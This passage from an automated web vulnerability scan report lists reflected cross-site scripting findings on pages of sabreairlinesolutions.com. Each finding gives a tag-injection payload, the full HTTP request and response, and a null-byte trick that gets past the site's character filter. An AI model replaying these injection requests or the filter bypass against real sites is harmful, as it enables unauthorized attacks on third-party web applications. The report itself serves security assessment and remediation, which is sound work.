Set-Cookie: exp_last_visit=1286323053; expires=Thu, 06-Oct-2011 10:18:25 GMT; path=/
Set-Cookie: exp_last_activity=1286378305; expires=Thu, 06-Oct-2011 10:18:25 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:18:26 GMT
Pragma: no-cache
Content-Length: 2152
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="/home/includes/form_suites?suite=enterprise_operations&iframe=true&width=50022f32"><a>5557ac528ce&height=500" />
...[SNIP]...

3.99. http://www.sabreairlinesolutions.com/home/news_events [%004809212e2bef5c79 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events

Issue detail

The value of the %0048092<a>12e2bef5c79 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 633a2"><a>735ea7d59b4 was submitted in the %0048092<a>12e2bef5c79 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/news_events?%0048092<a>12e2bef5c79=1633a2"><a>735ea7d59b4 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.sabreairlinesolutions.com
Cookie: exp_last_visit=970953067; exp_last_activity=1286313086; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 18:18:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286313086; expires=Wed, 05-Oct-2011 18:18:09 GMT; path=/
Set-Cookie: exp_last_activity=1286320689; expires=Wed, 05-Oct-2011 18:18:09 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 18:18:10 GMT
Pragma: no-cache
Content-Length: 7833
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>12e2bef5c79=1633a2"><a>735ea7d59b4">
...[SNIP]...

3.100. http://www.sabreairlinesolutions.com/home/news_events [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0016d00"><a>26e1511d709 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16d00"><a>26e1511d709 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events?%0016d00"><a>26e1511d709=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:19:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286317180; expires=Wed, 05-Oct-2011 17:19:40 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:19:58 GMT
Pragma: no-cache
Content-Length: 7795
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/news_events?%0016d00"><a>26e1511d709=1">
...[SNIP]...

3.101. http://www.sabreairlinesolutions.com/home/news_events/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a5f95"><a>5ba92138525 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5f95"><a>5ba92138525 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/?%00a5f95"><a>5ba92138525=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321219; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproducts_services%2Fproduct%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:37:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321219; expires=Thu, 06-Oct-2011 09:37:19 GMT; path=/
Set-Cookie: exp_last_activity=1286375839; expires=Thu, 06-Oct-2011 09:37:19 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproducts_services%2Fproduct%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:37:23 GMT
Pragma: no-cache
Content-Length: 7834
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/news_events/?%00a5f95"><a>5ba92138525=1">
...[SNIP]...

3.102. http://www.sabreairlinesolutions.com/home/news_events/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00c3bac<a>1d963d7e0b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c3bac<a>1d963d7e0b4 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/?%00c3bac<a>1d963d7e0b4=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321219; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproducts_services%2Fproduct%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:41:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321219; expires=Thu, 06-Oct-2011 09:42:00 GMT; path=/
Set-Cookie: exp_last_activity=1286376120; expires=Thu, 06-Oct-2011 09:42:00 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproducts_services%2Fproduct%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:42:26 GMT
Pragma: no-cache
Content-Length: 7830
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>1d963d7e0b4=1">?%00c3bac<a>1d963d7e0b4=1</a>
...[SNIP]...

3.103. http://www.sabreairlinesolutions.com/home/news_events/event/2009_sabresonic_loyalty_user_conference [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/2009_sabresonic_loyalty_user_conference

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %001da3b<a>f5b12036d1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1da3b<a>f5b12036d1a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/2009_sabresonic_loyalty_user_conference?%001da3b<a>f5b12036d1a=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/news_events/events/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322311; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:27:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322311; expires=Thu, 06-Oct-2011 09:27:03 GMT; path=/
Set-Cookie: exp_last_activity=1286375223; expires=Thu, 06-Oct-2011 09:27:03 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fnews_events%2Fevent%2F2009_sabresonic_loyalty_user_conference%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A4%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:27:06 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 11959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a>f5b12036d1a=1">2009 sabresonic loyalty user conference?%001da3b<a>f5b12036d1a=1</a>
...[SNIP]...

3.104. http://www.sabreairlinesolutions.com/home/news_events/event/2009_sabresonic_loyalty_user_conference [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/2009_sabresonic_loyalty_user_conference

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0071aa9"><a>a46e784cedb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71aa9"><a>a46e784cedb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/2009_sabresonic_loyalty_user_conference?%0071aa9"><a>a46e784cedb=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/news_events/events/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322311; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:21:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322311; expires=Thu, 06-Oct-2011 09:21:59 GMT; path=/
Set-Cookie: exp_last_activity=1286374919; expires=Thu, 06-Oct-2011 09:21:59 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fnews_events%2Fevent%2F2009_sabresonic_loyalty_user_conference%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A4%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:22:24 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 11963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/event/2009_sabresonic_loyalty_user_conference?%0071aa9"><a>a46e784cedb=1">
...[SNIP]...

3.105. http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/operations_user_conference

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %001f710<a>ed5b0b7211d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1f710<a>ed5b0b7211d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/operations_user_conference?%001f710<a>ed5b0b7211d=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/news_events/events/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322307; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:27:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322307; expires=Thu, 06-Oct-2011 09:27:48 GMT; path=/
Set-Cookie: exp_last_activity=1286375268; expires=Thu, 06-Oct-2011 09:27:48 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A4%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:28:15 GMT
Pragma: no-cache
Content-Length: 6089
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a>ed5b0b7211d=1">operations user conference?%001f710<a>ed5b0b7211d=1</a>
...[SNIP]...

3.106. http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/operations_user_conference

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ae971"><a>710f86d987f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ae971"><a>710f86d987f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/operations_user_conference?%00ae971"><a>710f86d987f=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/news_events/events/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322307; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A1%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:23:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322307; expires=Thu, 06-Oct-2011 09:23:19 GMT; path=/
Set-Cookie: exp_last_activity=1286374999; expires=Thu, 06-Oct-2011 09:23:19 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A4%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:23:33 GMT
Pragma: no-cache
Content-Length: 6093
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/event/operations_user_conference?%00ae971"><a>710f86d987f=1">
...[SNIP]...

3.107. http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference2 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/operations_user_conference2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0053da6"><a>69ed5e196d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 53da6"><a>69ed5e196d9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

